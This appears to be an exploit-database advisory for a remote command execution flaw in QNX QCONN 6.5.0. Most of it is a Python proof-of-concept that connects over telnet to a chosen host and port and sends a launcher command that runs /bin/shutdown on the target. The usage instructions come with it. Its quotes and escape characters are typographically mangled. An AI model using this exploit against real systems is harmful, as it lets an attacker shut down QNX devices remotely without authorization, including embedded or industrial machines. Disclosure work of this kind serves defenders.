QNX QCONN Remote Command Execution Exploit

Summary

QNX QCONN suffers from remote command execution vulnerability

Credit:

The information has been provided by Mor!p3r.


Details

Vulnerable Systems:
 * QNX 6.5.0 >= , QCONN >= 1.4.207944

import telnetlib
import sys

if len(sys.argv) < 3:
print ‘ ‘
print ‘ —————————————————–‘
print ‘ + Qconn Remote Command Execution PoC (Shutdown) +’
print ‘ —————————————————–‘
print ‘ ‘
print ‘ + Usage: QCONNRC.py <Target IP> <Port>’
print ‘ + Ex> QCONNRC.py 192.168.0.1 8000′
print ”
sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
attack =’service launchern’ + ‘start/flags 8000 /bin/shutdown /bin/shutdown -bn’ + ‘continuen’
telnet = telnetlib.Telnet(host, port)
telnet.write(attack)
print ‘[+] Finish’
telnet.close()

Disclosure Timeline:
Published: 2012-09-12

Categories: Exploits